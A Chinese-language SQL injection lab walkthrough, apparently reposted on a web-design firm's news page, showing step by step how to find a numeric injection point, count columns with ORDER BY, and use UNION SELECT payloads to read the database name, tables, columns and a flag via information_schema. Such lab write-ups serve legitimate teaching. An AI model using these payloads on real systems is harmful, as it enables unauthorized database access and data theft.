尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

SQL注入靶场显错注入(一)

SQL注入靶场显错注入(一)
📅 发布时间:2026/6/21 16:58:19

 

SQL注入靶场显错注入(一)

1

确定注入点位置

1.1.根据请求方式的不同分为GET和POST

GET型注入

    注入参数通过 URL(查询字符串) 传递,通常是由用户直接在浏览器地址栏输入

格式通常为:http://example.com/page.php?id=1&name=admin

 

POST型注入

    注入参数通过 HTTP请求正文(Body) 传递,通常是通过<form method="POST">提交的表单数据(如登录框、搜索框、评论框)

格式通常为:POST提交到/login.php,请求正文为 username=admin&password=123456

1.2.注入点在GET请求的ID参数里

image

2

确定注入类型和字段数

2.1.测试注入字段类型

使用逗号返回空,没引起报错。使用2-1返回正常值说明存在数字型注入。

字符型注入的后端为:

"SELECT * FROM user WHERE id='$_GET[id]'";

因此需要使用单引号闭合语句。而数字型注入后端为:

"SELECT * FROM user WHERE id=$_GET[id]";

直接使用逻辑判断为数字型注入。

2.2.使用ORDER BY判断字段数

使用列索引排序判断字段数,实际后台执行:

image

判断出字段数为3,当输入4时返回-No results found

image

3

确定回显点

3.1.使用union函数判断回显点

image

确认回显点是2和3

image

 

4

获取当前数据库的库名和表名

4.1.获取当前数据库的库名

?id=89 union select 1,version(),database()

image

4.2.获取当前数据库的表名

?id=91 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='error')

image

5

获取列名和Flag

5.1.获取列名

?id=91 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='error_flag' and table_schema='error')

image

5.2.获取Flag

?id=91 union select 1,2,group_concat(flag) from error_flag

image

END

 

相关新闻

  • 2025年终有机肥发酵翻抛机厂家TOP5推荐:有机肥生产设备选型指南
  • 让Windows系统在每次登录时自动联网同步时间
  • AI浪潮下的冷思考:技术、赛道与我们的未来

最新新闻

  • 立足云南深耕西南、全域覆盖全国 考编雷达差异化打造一站式考编服务平台 - 速递信息
  • [智能体-489]:在星际文明发展的过程中,目前处于什么阶段?
  • Jellyfin桌面客户端:构建专业级开源媒体中心的完整指南
  • Linux超级用户本质:EUID、SUID与权限机制深度解析
  • LPC112x微控制器:从8/16位平滑升级到32位ARM Cortex-M0的实战指南
  • Windows下用Ollama+OpenClaw搭建本地AI Agent实战指南

日新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

周新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号